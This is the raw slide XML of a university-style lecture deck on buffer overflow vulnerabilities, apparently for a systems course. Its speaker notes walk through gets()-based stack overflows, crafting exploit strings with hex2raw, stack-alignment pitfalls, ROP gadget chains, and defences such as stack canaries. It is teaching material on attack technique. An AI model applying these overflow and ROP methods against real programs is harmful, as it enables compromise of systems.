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1" r:id="rId3"/>
    <p:sldId id="331" r:id="rId4"/>
    <p:sldId id="321" r:id="rId5"/>
    <p:sldId id="332" r:id="rId6"/>
    <p:sldId id="333" r:id="rId7"/>
    <p:sldId id="295" r:id="rId8"/>
    <p:sldId id="296" r:id="rId9"/>
    <p:sldId id="322" r:id="rId10"/>
    <p:sldId id="323" r:id="rId11"/>
    <p:sldId id="324" r:id="rId12"/>
    <p:sldId id="334" r:id="rId13"/>
    <p:sldId id="335" r:id="rId14"/>
    <p:sldId id="336" r:id="rId15"/>
    <p:sldId id="337" r:id="rId16"/>
    <p:sldId id="338" r:id="rId17"/>
    <p:sldId id="325" r:id="rId18"/>
    <p:sldId id="363" r:id="rId19"/>
    <p:sldId id="339" r:id="rId20"/>
    <p:sldId id="340" r:id="rId21"/>
    <p:sldId id="326" r:id="rId22"/>
    <p:sldId id="341" r:id="rId23"/>
    <p:sldId id="346" r:id="rId24"/>
    <p:sldId id="327" r:id="rId25"/>
    <p:sldId id="351" r:id="rId26"/>
    <p:sldId id="328" r:id="rId27"/>
    <p:sldId id="329" r:id="rId28"/>
    <p:sldId id="352" r:id="rId29"/>
    <p:sldId id="342" r:id="rId30"/>
    <p:sldId id="349" r:id="rId31"/>
    <p:sldId id="350" r:id="rId32"/>
    <p:sldId id="347" r:id="rId33"/>
    <p:sldId id="353" r:id="rId34"/>
    <p:sldId id="343" r:id="rId35"/>
    <p:sldId id="344" r:id="rId36"/>
    <p:sldId id="345" r:id="rId37"/>
    <p:sldId id="354" r:id="rId38"/>
    <p:sldId id="330" r:id="rId39"/>
    <p:sldId id="355" r:id="rId40"/>
    <p:sldId id="364" r:id="rId41"/>
    <p:sldId id="356" r:id="rId42"/>
    <p:sldId id="357" r:id="rId43"/>
    <p:sldId id="365" r:id="rId44"/>
    <p:sldId id="358" r:id="rId45"/>
    <p:sldId id="359" r:id="rId46"/>
    <p:sldId id="366" r:id="rId47"/>
    <p:sldId id="360" r:id="rId48"/>
    <p:sldId id="367" r:id="rId49"/>
    <p:sldId id="320" r:id="rId50"/>
    <p:sldId id="36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AFF"/>
    <a:srgbClr val="F7C1EE"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="00FF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01" autoAdjust="0"/>
    <p:restoredTop sz="80138" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="127" d="100"/>
          <a:sy n="127" d="100"/>
        </p:scale>
        <p:origin x="664" y="17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6/17/21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examples here are all x86, ARM is vulnerable, too. It’s just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>easier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> to exploit x86 than it is ARM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>Code injection is just as easy on ARM (even though return address is in register, the previous function’s return address is on the stack) but may not be able to get as many instructions in shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>ROP is harder because you cannot “return” into the middle of an existing instruction to repurpose its bytes – for a while, ROP was thought to be impossible on ARM, but proof-of-concept was demonstrated in 2009.</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440923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83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 18 is a legal instruction, and it’s at an executable address. Best case scenario, we would’ve expected to be prompted to input a string) – but instead we get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>segfault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> while executing the instruction at address 0x400608 (calling puts).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>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Here’s why: When the function is finished, it adds 0x18 to the stack pointer, bringing it to 0x7FFFFFFFE008 and then pops off the “return address”, bringing the stack pointer to 0x7FFFFFFFE010, which is properly aligned on a 16-byte boundary. But 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 08 is “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x8, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”. Subtracting 0x18 from the stack pointer causes the stack pointer to no longer be aligned on a 16-byte boundary when making the puts call.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That’s not the only problem… because the “instruction” at 400600 specifies 32-bit math, -0x18 only gets sign-extended to 32 bits, leaving the upper 32 bits as 0.  -0x18 = 0xFFFFFFE8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FFFFFFFE010 + 0xFFFFFFE8 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 0x8000FFFFDFF8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>which will get truncated to 0x0000FFFFDFF8 because x86-64 has a 47-bit address space.</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2818505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2010936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generate a string with the bytes EB 05 40 in the correct locations</a:t>
            </a:r>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209437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exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> describes the bytes we want, but what we see as “48” is bytes 0x34 and 0x38. Instead, we want the actual byte 0x48.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s where hex2raw.c comes into play. (There are many implementations out on the web; I’ve included my implementation in textbook-code/chap11.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that the “filler” really doesn’t matter, as long as it has the requisite number of bytes. The new return address, however, does matter.</a:t>
            </a:r>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2607005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went wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt; 0x0A is the newline character, which is how gets() recognizes the end of user input – so while we overflowed the buffer, we didn’t inject the new return address. Here, it’s just filler, so it’ll be easy to replace. If 0x0A is ever part of an address or part of a line of assembly code that we’re injecting, we’ll have to find an alternative.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depending on the particular vulnerability we’re attacking, we may need instead to be careful with 0x00, because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will stop when it encounters 0x00.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;</a:t>
            </a:r>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1182225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an upward-growing stack (from lower addresses to higher addresses) does not prevent buffer overflow attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’d put the shellcode’s address in the return address for the gets() call instead of for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buffer_too_small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call.</a:t>
            </a:r>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1453666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Commonly called “shellcode” because an attacker generally uses buffer overflow to start a command shell. I’m calling it “exploit code” because I’m not trying to get a shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In fact, some of the more infamous buffer overflow attacks were not about getting a command shell. Morris Worm, IM Wars, …</a:t>
            </a:r>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3024683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programmers create buffers large enough that most reasonable inputs will fit</a:t>
            </a:r>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752565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bytes fits within the available space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> work; however, we’ll probably get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>segfault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> when caller() tries to print its message – the original return address (and our injected return address) are positioned so that after returning, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> is divisible by 16 – in accordance with the ABI. If we put this return address where the stack pointer is, then after the return instruction pops the address, the stack pointer will then be misaligned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>What we need to do is make sure everything is aligned properly when the address is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>popped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> off the stack.</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3301462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that by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>pushing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> the address onto the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>6 bytes not only fits in the available space; it fits in the buffer!</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235599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not to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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205735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1162714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exploit string is read in, here is what our stack frame looks like. Some alignment space, the buffer, some more alignment space, the return address, and the caller’s stack frame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After the exploit string is read in &lt;click&gt; we overwrote the return address with the address of the buffer, and the buffer contains some opcodes &lt;click&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before returning &lt;click&gt; we deallocate the stack frame, and then we return &lt;click&gt;. This pops the “return address” off the stack and places it in the instruction pointer. &lt;click&gt; We now push 0x400648 (the original return address) on to the stack, repositioning the stack pointer so that it’s properly aligned for a return &lt;click&gt;</a:t>
            </a:r>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874908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1873415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fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reads at most one less than the specified number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s”) reads at most the specified number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t assume the system library has no vulnerabilities!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795272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Canary code in amber (including removing the canary from %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, to keep attacker from reading it)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incidental change in buffer’s address in blue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Stack canaries may or may not be enabled by default. If in doubt, add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>“-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>-protector” to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> arguments.</a:t>
            </a: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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2636342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actual canary from one use (observed via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt; buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt; detected</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414912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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374242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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3218597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go without saying, but do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> add “-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>” to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> arguments!</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2969285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372597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not to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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260312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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2186388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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-equivalent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ax,%ax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nopl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x0(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %rax,1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nopw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x0(%rax,%rax,1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – used to align jump-targets to 16-byte boundaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="575863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 with the ret instruction from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buffer_too_small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;“Return” to the first gadget: putting a 0 in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, really, but it’ll zero-extend)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unwanted adjustment to stack pointer, but we can handle that by adding some filler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;”Return” to next gadget: popping a value off of the stack, into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ll pop 0x42 (‘B’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;”Return” to next gadget: add the lower 8 bits of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the lower 8 bits of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – 0x42+0x0 = 0x42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;”Return” to next gadget, whatever that happens to be…</a:t>
            </a:r>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2216719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SQL poisoning, but it’s still an injection attack</a:t>
            </a:r>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162737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355331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 is deprecated in C99 and removed from C11.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow vulnerabilities still exist in legacy code, and it is still possible to introduce them using other naïve string functions</a:t>
            </a:r>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1408837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2916474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Unsurprisingly, nothing bad happens when we enter only seven characters.</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1730713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Because there’s some unused memory between the buffer and the edge of the stack frame, we can get away with some sloppiness</a:t>
            </a:r>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49190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…we can get away with a lot of sloppiness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414555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D5742FA-DDBF-7042-A71C-D54821FE246C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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80499-AAA1-1245-BB73-E558D53E9F03}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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F2E11BE-C40F-934A-86F4-62A33EEA3AA2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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A10C65-8725-424E-A5F7-3006C7FEFA94}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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961AC0-3148-C74A-893F-B6A6DE16027D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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CBE19F-AE55-E04F-9AB3-496C848C01A8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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F741E-5263-414E-B593-0C7144E84B2C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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A1F109-8E47-8743-81F7-72A703C29E95}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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3AB537-98B9-984A-B5F1-FFB674D06485}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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2B9CA413-552F-AE42-A1D1-0BF0A26C9852}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/17/21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l.acm.org/doi/10.1145/358198.358210"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xkcd.com/32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Buffer Overflow Vulnerabilities</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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Most Direct Way to Introduce Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193E7E69-E7C4-C542-A559-19CFAC0B4892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1825625"/>
            <a:ext cx="5257800" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reads from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>writes to buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No way to limit number of characters read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
